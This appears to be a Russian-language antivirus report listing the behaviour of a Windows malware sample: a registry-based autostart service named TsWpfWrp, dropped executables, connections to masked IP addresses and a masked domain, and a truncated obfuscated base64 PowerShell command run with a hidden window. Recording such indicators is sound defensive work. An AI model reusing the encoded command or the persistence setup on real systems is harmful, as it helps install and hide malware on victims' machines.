Техническая информация
- [<HKLM>\System\CurrentControlSet\Services\TsWpfWrp] 'Start' = '00000002'
- [<HKLM>\System\CurrentControlSet\Services\TsWpfWrp] 'ImagePath' = '"%WINDIR%\SysWOW64\hlink\TsWpfWrp.exe"'
- 'TsWpfWrp' "%WINDIR%\SysWOW64\hlink\TsWpfWrp.exe"
- 'TsWpfWrp' %WINDIR%\SysWOW64\hlink\TsWpfWrp.exe
- '<SYSTEM32>\windowspowershell\v1.0\powershell.exe' -e JABCAGMAXwAwADYAYwBpAD0AKAAnAFgAdwAnACsAKAAnAHAAcgAnACsAJwBpACcAKQArACcAOAA3ACcAKQA7ACYAKAAnAG4AZQAnACsAJwB3AC0AJwArACcAaQB0AGUAbQAnACkAIAAkAEUATgBWADoAdQBzAEUAUgBwAHIATwBGAEkAbABFAFwAdwA4AE...
- %HOMEPATH%\w8faxlv\zvuhrbm\vkb29j8_z.exe
- %WINDIR%\syswow64\hlink\tswpfwrp.exe
- %HOMEPATH%\w8faxlv\zvuhrbm\vkb29j8_z.exe в %WINDIR%\syswow64\hlink\tswpfwrp.exe
- '96.#27.52.8':443
- http://ma###lhi.com/_vti_bin/x/
- http://96.##7.52.8:443/096wbTkkERo6kQLSK/J7lmjakzm/ via 96.#27.52.8
- DNS ASK ma###lhi.com
- '%HOMEPATH%\w8faxlv\zvuhrbm\vkb29j8_z.exe'
- '%WINDIR%\syswow64\hlink\tswpfwrp.exe'
- '<SYSTEM32>\windowspowershell\v1.0\powershell.exe' -e JABCAGMAXwAwADYAYwBpAD0AKAAnAFgAdwAnACsAKAAnAHAAcgAnACsAJwBpACcAKQArACcAOAA3ACcAKQA7ACYAKAAnAG4AZQAnACsAJwB3AC0AJwArACcAaQB0AGUAbQAnACkAIAAkAEUATgBWADoAdQBzAEUAUgBwAHIATwBGAEkAbABFAFwAdwA4AE...' (со скрытым окном)